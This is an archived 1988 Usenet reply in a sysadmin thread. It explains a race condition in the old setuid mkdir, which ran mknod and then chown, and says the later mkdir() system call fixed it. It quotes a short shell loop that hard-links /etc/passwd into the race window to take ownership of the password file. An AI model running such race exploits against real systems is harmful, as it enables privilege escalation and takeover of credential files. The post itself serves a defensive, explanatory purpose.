Xref: utzoo news.sysadmin:1873 news.admin:4220
Path: utzoo!utgpu!watmath!clyde!att!osu-cis!tut.cis.ohio-state.edu!cwjcc!hal!nic.MR.NET!tank!mimsy!dftsrv!ames!amdcad!sun!pitstop!sundc!seismo!uunet!mcvax!hp4nl!botter!star.cs.vu.nl!maart
From: maart@cs.vu.nl (Maarten Litmaath)
Newsgroups: news.sysadmin,news.admin
Subject: Re: security hole
Keywords: security, bug
Message-ID: <1777@solo11.cs.vu.nl>
Date: 7 Dec 88 02:11:17 GMT
References: <1191@altger.UUCP>
Organization: V.U. Informatica, Amsterdam, the Netherlands
Lines: 24

blue@altger.UUCP (blue) writes:
\   while true
\   do
\	   nice -39 mkdir foo &
\          rm -rf foo
\	   ln /etc/passwd foo; rm -fr foo &
\	   ls -l /etc/passwd
\   done

This is precisely why nowadays there's a mkdir() system call!
Formerly the mkdir scheme was as follows:

	mknod(path, S_IFDIR, dev);
	/* now the directory exists, its owner is root and it's empty */
	chown(path, uid, gid);	/* now the owner is set */
	chdir(path);
	link(path, ".");	/* make entry `.' in new directory */
	link(parent, "..");	/* make entry `..' */

The `rm -rf foo; ln /etc/passwd foo' must `hit' right AFTER the mknod(), but
BEFORE the chown(). Due to race conditions this scheme will eventually succeed.
-- 
fcntl(fd, F_SETFL, FNDELAY):          |Maarten Litmaath @ VU Amsterdam:
      let's go weepin' in the corner! |maart@cs.vu.nl, mcvax!botter!maart